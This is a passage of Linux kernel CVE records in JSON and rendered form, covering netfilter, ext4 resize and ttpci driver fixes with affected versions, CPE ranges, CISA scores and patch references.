"status": "affected",
"version": "bbdb3b65aa91aa0a32b212f27780b28987f2d94f",
"versionType": "git"
},
{
"lessThan": "e2d45f467096e931044f0ab7634499879d851a5c",
"status": "affected",
"version": "448be0774882f95a74fa5eb7519761152add601b",
"versionType": "git"
},
{
"lessThan": "291cca35818bd52a407bc37ab45a15816039e363",
"status": "affected",
"version": "d19e8bf3ea4114dd21fc35da21f398203d7f7df1",
"versionType": "git"
},
{
"lessThan": "406b0241d0eb598a0b330ab20ae325537d8d8163",
"status": "affected",
"version": "ea3eb9f2192e4fc33b795673e56c97a21987f868",
"versionType": "git"
},
{
"lessThan": "b2d6f9a5b1cf968f1eaa71085ceeb09c2cb276b1",
"status": "affected",
"version": "5f68718b34a531a556f2f50300ead2862278da26",
"versionType": "git"
},
{
"lessThan": "5224afbc30c3ca9ba23e752f0f138729b2c48dd8",
"status": "affected",
"version": "5f68718b34a531a556f2f50300ead2862278da26",
"versionType": "git"
},
{
"lessThan": "552705a3650bbf46a22b1adedc1b04181490fc36",
"status": "affected",
"version": "5f68718b34a531a556f2f50300ead2862278da26",
"versionType": "git"
},
{
"status": "affected",
"version": "0624f190b5742a1527cd938295caa8dc5281d4cd",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.5"
},
{
"lessThan": "6.5",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "5.4.262",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "5.10.198",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "5.15.134",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "6.1.56",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "6.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "6.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "6.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.4.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: mark set as dead when unbinding anonymous set with timeout\n\nWhile the rhashtable set gc runs asynchronously, a race allows it to\ncollect elements from anonymous sets with timeouts while it is being\nreleased from the commit path.\n\nMingi Cho originally reported this issue in a different path in 6.1.x\nwith a pipapo set with low timeouts which is not possible upstream since\n7395dfacfff6 (\"netfilter: nf_tables: use timestamp to check for set\nelement timeout\").\n\nFix this by setting on the dead flag for anonymous sets to skip async gc\nin this case.\n\nAccording to 08e4c8c5919f (\"netfilter: nf_tables: mark newset as dead on\ntransaction abort\"), Florian plans to accelerate abort path by releasing\nobjects via workqueue, therefore, this sets on the dead flag for abort\npath too."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:54:20.632Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d75a589bb92af1abf3b779cfcd1977ca11b27033"
},
{
"url": "https://git.kernel.org/stable/c/edcf1a3f182ecf8b6b805f0ce90570ea98c5f6bf"
},
{
"url": "https://git.kernel.org/stable/c/e2d45f467096e931044f0ab7634499879d851a5c"
},
{
"url": "https://git.kernel.org/stable/c/291cca35818bd52a407bc37ab45a15816039e363"
},
{
"url": "https://git.kernel.org/stable/c/406b0241d0eb598a0b330ab20ae325537d8d8163"
},
{
"url": "https://git.kernel.org/stable/c/b2d6f9a5b1cf968f1eaa71085ceeb09c2cb276b1"
},
{
"url": "https://git.kernel.org/stable/c/5224afbc30c3ca9ba23e752f0f138729b2c48dd8"
},
{
"url": "https://git.kernel.org/stable/c/552705a3650bbf46a22b1adedc1b04181490fc36"
}
],
"title": "netfilter: nf_tables: mark set as dead when unbinding anonymous set with timeout",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26643",
"datePublished": "2024-03-21T10:43:44.103Z",
"dateReserved": "2024-02-19T14:20:24.137Z",
"dateUpdated": "2025-05-04T12:54:20.632Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52622 (GCVE-0-2023-52622)
Vulnerability from cvelistv5
Published
2024-03-26 17:19
Modified
2025-05-04 07:40
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ext4: avoid online resizing failures due to oversized flex bg
When we online resize an ext4 filesystem with a oversized flexbg_size,
mkfs.ext4 -F -G 67108864 $dev -b 4096 100M
mount $dev $dir
resize2fs $dev 16G
the following WARN_ON is triggered:
==================================================================
WARNING: CPU: 0 PID: 427 at mm/page_alloc.c:4402 __alloc_pages+0x411/0x550
Modules linked in: sg(E)
CPU: 0 PID: 427 Comm: resize2fs Tainted: G E 6.6.0-rc5+ #314
RIP: 0010:__alloc_pages+0x411/0x550
Call Trace:
<TASK>
__kmalloc_large_node+0xa2/0x200
__kmalloc+0x16e/0x290
ext4_resize_fs+0x481/0xd80
__ext4_ioctl+0x1616/0x1d90
ext4_ioctl+0x12/0x20
__x64_sys_ioctl+0xf0/0x150
do_syscall_64+0x3b/0x90
==================================================================
This is because flexbg_size is too large and the size of the new_group_data
array to be allocated exceeds MAX_ORDER. Currently, the minimum value of
MAX_ORDER is 8, the minimum value of PAGE_SIZE is 4096, the corresponding
maximum number of groups that can be allocated is:
(PAGE_SIZE << MAX_ORDER) / sizeof(struct ext4_new_group_data) ≈ 21845
And the value that is down-aligned to the power of 2 is 16384. Therefore,
this value is defined as MAX_RESIZE_BG, and the number of groups added
each time does not exceed this value during resizing, and is added multiple
times to complete the online resizing. The difference is that the metadata
in a flex_bg may be more dispersed.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52622",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-09T19:32:18.763669Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-09T19:32:30.135Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:21.365Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cd1f93ca97a9136989f3bd2bf90696732a2ed644"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b183fe8702e78bba3dcef8e7193cab6898abee07"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cfbbb3199e71b63fc26cee0ebff327c47128a1e8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d76c8d7ffe163c6bf2f1ef680b0539c2b3902b90"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6d2cbf517dcabc093159cf138ad5712c9c7fa954"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8b1413dbfe49646eda2c00c0f1144ee9d3368e0c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dc3e0f55bec4410f3d74352c4a7c79f518088ee2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5d1935ac02ca5aee364a449a35e2977ea84509b0"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/ext4/resize.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "cd1f93ca97a9136989f3bd2bf90696732a2ed644",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "b183fe8702e78bba3dcef8e7193cab6898abee07",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "cfbbb3199e71b63fc26cee0ebff327c47128a1e8",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d76c8d7ffe163c6bf2f1ef680b0539c2b3902b90",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6d2cbf517dcabc093159cf138ad5712c9c7fa954",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "8b1413dbfe49646eda2c00c0f1144ee9d3368e0c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "dc3e0f55bec4410f3d74352c4a7c79f518088ee2",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "5d1935ac02ca5aee364a449a35e2977ea84509b0",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/ext4/resize.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.77",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.16",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.77",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: avoid online resizing failures due to oversized flex bg\n\nWhen we online resize an ext4 filesystem with a oversized flexbg_size,\n\n mkfs.ext4 -F -G 67108864 $dev -b 4096 100M\n mount $dev $dir\n resize2fs $dev 16G\n\nthe following WARN_ON is triggered:\n==================================================================\nWARNING: CPU: 0 PID: 427 at mm/page_alloc.c:4402 __alloc_pages+0x411/0x550\nModules linked in: sg(E)\nCPU: 0 PID: 427 Comm: resize2fs Tainted: G E 6.6.0-rc5+ #314\nRIP: 0010:__alloc_pages+0x411/0x550\nCall Trace:\n \u003cTASK\u003e\n __kmalloc_large_node+0xa2/0x200\n __kmalloc+0x16e/0x290\n ext4_resize_fs+0x481/0xd80\n __ext4_ioctl+0x1616/0x1d90\n ext4_ioctl+0x12/0x20\n __x64_sys_ioctl+0xf0/0x150\n do_syscall_64+0x3b/0x90\n==================================================================\n\nThis is because flexbg_size is too large and the size of the new_group_data\narray to be allocated exceeds MAX_ORDER. Currently, the minimum value of\nMAX_ORDER is 8, the minimum value of PAGE_SIZE is 4096, the corresponding\nmaximum number of groups that can be allocated is:\n\n (PAGE_SIZE \u003c\u003c MAX_ORDER) / sizeof(struct ext4_new_group_data) \u2248 21845\n\nAnd the value that is down-aligned to the power of 2 is 16384. Therefore,\nthis value is defined as MAX_RESIZE_BG, and the number of groups added\neach time does not exceed this value during resizing, and is added multiple\ntimes to complete the online resizing. The difference is that the metadata\nin a flex_bg may be more dispersed."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:40:10.143Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/cd1f93ca97a9136989f3bd2bf90696732a2ed644"
},
{
"url": "https://git.kernel.org/stable/c/b183fe8702e78bba3dcef8e7193cab6898abee07"
},
{
"url": "https://git.kernel.org/stable/c/cfbbb3199e71b63fc26cee0ebff327c47128a1e8"
},
{
"url": "https://git.kernel.org/stable/c/d76c8d7ffe163c6bf2f1ef680b0539c2b3902b90"
},
{
"url": "https://git.kernel.org/stable/c/6d2cbf517dcabc093159cf138ad5712c9c7fa954"
},
{
"url": "https://git.kernel.org/stable/c/8b1413dbfe49646eda2c00c0f1144ee9d3368e0c"
},
{
"url": "https://git.kernel.org/stable/c/dc3e0f55bec4410f3d74352c4a7c79f518088ee2"
},
{
"url": "https://git.kernel.org/stable/c/5d1935ac02ca5aee364a449a35e2977ea84509b0"
}
],
"title": "ext4: avoid online resizing failures due to oversized flex bg",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52622",
"datePublished": "2024-03-26T17:19:23.838Z",
"dateReserved": "2024-03-06T09:52:12.090Z",
"dateUpdated": "2025-05-04T07:40:10.143Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27073 (GCVE-0-2024-27073)
Vulnerability from cvelistv5
Published
2024-05-01 13:04
Modified
2025-05-04 09:03
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
media: ttpci: fix two memleaks in budget_av_attach
When saa7146_register_device and saa7146_vv_init fails, budget_av_attach
should free the resources it allocates, like the error-handling of
ttpci_budget_init does. Besides, there are two fixme comment refers to
such deallocations.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-27073",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-06T18:09:11.753345Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-06T18:51:09.232Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:27:57.810Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/af37aed04997e644f7e1b52b696b62dcae3cc016"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/910363473e4bf97da3c350e08d915546dd6cc30b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/24e51d6eb578b82ff292927f14b9f5ec05a46beb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/55ca0c7eae8499bb96f4e5d9b26af95e89c4e6a0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7393c681f9aa05ffe2385e8716989565eed2fe06"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1597cd1a88cfcdc4bf8b1b44cd458fed9a5a5d63"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/656b8cc123d7635dd399d9f02594f27aa797ac3c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d0b07f712bf61e1a3cf23c87c663791c42e50837"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/media/pci/ttpci/budget-av.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "af37aed04997e644f7e1b52b696b62dcae3cc016",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "910363473e4bf97da3c350e08d915546dd6cc30b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "24e51d6eb578b82ff292927f14b9f5ec05a46beb",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "55ca0c7eae8499bb96f4e5d9b26af95e89c4e6a0",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "7393c681f9aa05ffe2385e8716989565eed2fe06",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "1597cd1a88cfcdc4bf8b1b44cd458fed9a5a5d63",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "656b8cc123d7635dd399d9f02594f27aa797ac3c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d0b07f712bf61e1a3cf23c87c663791c42e50837",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/media/pci/ttpci/budget-av.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.12"
},
{
"lessThan": "2.6.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "2.6.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: ttpci: fix two memleaks in budget_av_attach\n\nWhen saa7146_register_device and saa7146_vv_init fails, budget_av_attach\nshould free the resources it allocates, like the error-handling of\nttpci_budget_init does. Besides, there are two fixme comment refers to\nsuch deallocations."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:03:38.571Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/af37aed04997e644f7e1b52b696b62dcae3cc016"
},
{
"url": "https://git.kernel.org/stable/c/910363473e4bf97da3c350e08d915546dd6cc30b"
},
{
"url": "https://git.kernel.org/stable/c/24e51d6eb578b82ff292927f14b9f5ec05a46beb"
},
{
"url": "https://git.kernel.org/stable/c/55ca0c7eae8499bb96f4e5d9b26af95e89c4e6a0"
},
{
"url": "https://git.kernel.org/stable/c/7393c681f9aa05ffe2385e8716989565eed2fe06"
},
{
"url": "https://git.kernel.org/stable/c/1597cd1a88cfcdc4bf8b1b44cd458fed9a5a5d63"
},
{
"url": "https://git.kernel.org/stable/c/656b8cc123d7635dd399d9f02594f27aa797ac3c"
},
{
"url": "https://git.kernel.org/stable/c/d0b07f712bf61e1a3cf23c87c663791c42e50837"
}
],
"title": "media: ttpci: fix two memleaks in budget_av_attach",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27073",
"datePublished": "2024-05-01T13:04:37.653Z",
"dateReserved": "2024-02-19T14:20:24.216Z",
"dateUpdated": "2025-05-04T09:03:38.571Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-6040 (GCVE-0-2023-6040)
Vulnerability from cvelistv5
Published
2024-01-12 01:37
Modified
2025-06-17 21:09
Severity ?
VLAI Severity ?
EPSS score ?
CWE
Summary
An out-of-bounds access vulnerability involving netfilter was reported and fixed as: f1082dd31fe4 (netfilter: nf_tables: Reject tables of unsupported family); While creating a new netfilter table, lack of a safeguard against invalid nf_tables family (pf) values within `nf_tables_newtable` function enables an attacker to achieve out-of-bounds access.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| The Linux Kernel Organization | linux |
Version: 0 ≤ |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T08:21:17.118Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"issue-tracking",
"x_transferred"
],
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6040"
},
{
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://www.openwall.com/lists/oss-security/2024/01/12/1"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/01/12/1"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/177029/Kernel-Live-Patch-Security-Notice-LSN-0100-1.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-6040",
"options": [
{
"Exploitation": "none"
},
{
